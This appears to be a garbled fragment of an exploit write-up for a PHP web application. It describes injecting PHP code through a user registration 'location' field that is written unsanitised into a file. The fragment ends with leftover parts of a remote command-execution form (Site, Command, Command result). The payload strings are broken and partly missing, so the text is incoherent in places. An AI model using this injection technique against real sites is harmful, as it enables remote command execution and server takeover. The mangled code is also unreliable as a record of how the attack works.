"; $fp = fopen($filename, 'a+'); fputs($fp, $html) or die("Could not open file!"); --------------------------------- We see how data is added in the file,the variables including our evil code. So if we register as an user with the location : \";?> --------------------------------- So we can succesfully execute our commands. ------------------------------------------------------------ [+] Notes You can change my PHP code ( $codphp ) with what you want. Example : $codphp = "\";?>Click here to go back and execute another command

"; print "Command result:

" . nl2br($result) . "

"; } else { ?>

Site:
Command: